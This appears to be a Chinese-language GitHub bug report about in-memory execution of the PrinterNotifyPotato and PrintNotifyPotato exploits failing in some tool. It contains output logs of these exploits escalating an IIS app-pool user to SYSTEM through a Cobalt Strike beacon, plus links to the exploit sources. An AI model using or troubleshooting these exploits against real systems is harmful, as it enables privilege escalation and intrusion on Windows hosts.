[BUG]内存执行C#可执行EXP有问题 #223
Description
文件 : PrinterNotifyPotato.exe
命令行参数 : whoami
等待时间(秒) : 10
结束进程 : True
exe执行完成,输出信息:
Exploit for PrinterNotify Service DCOM Object local privalege escalation vulnerability(by SeImpersonatePrivilege abuse).
Part of GMH's fuck Tools, Code By zcgonvh.
[+] Current user: IIS APPPOOL\123
[x] CoCreateInstance fail with HRESULT: 0x80070005
ExecuteSharp end
文件 : PrintNotifyPotato.exe
命令行参数 : whoami
等待时间(秒) : 10
结束进程 : True
exe执行完成,输出信息:
[!] Cannot CoInitializeSecurity hr = -2147417831
[!] Cannot CreateInstance PrintNotify hr = -2147024891
ExecuteSharp end
下面是CS执行的就是正常的
[] Tasked beacon to run .NET program: PrintNotifyPotato.exe whoami
[+] host called home, sent: 131864 bytes
[+] received output:
[] Create PrintNotify Success!
[] Create FakeIUnknown Success!
[] CreatePointerMoniker Success!
[] Trigger......
[] Got Token: 0x49c
[] CurrentUser: NT AUTHORITY\SYSTEM
[] DuplicateTokenEx Success! PrimaryToken: 0x1162
[*] process start with pid 38374
nt authority\system
[*] Tasked beacon to run .NET program: PrinterNotifyPotato.exe whoami
[+] host called home, sent: 119560 bytes
[+] received output:
Exploit for PrinterNotify Service DCOM Object local privalege escalation vulnerability(by SeImpersonatePrivilege abuse).
Part of GMH's fuck Tools, Code By zcgonvh.
[+] Current user: IIS APPPOOL\123
[+] Get Token: 1284
[!] process with pid: 45324 created.
nt authority\system
————————————————————————————————————————
https://github.com/zcgonvh/DCOMPotato/blob/master/PrinterNotifyPotato.cs
https://github.com/BeichenDream/PrintNotifyPotato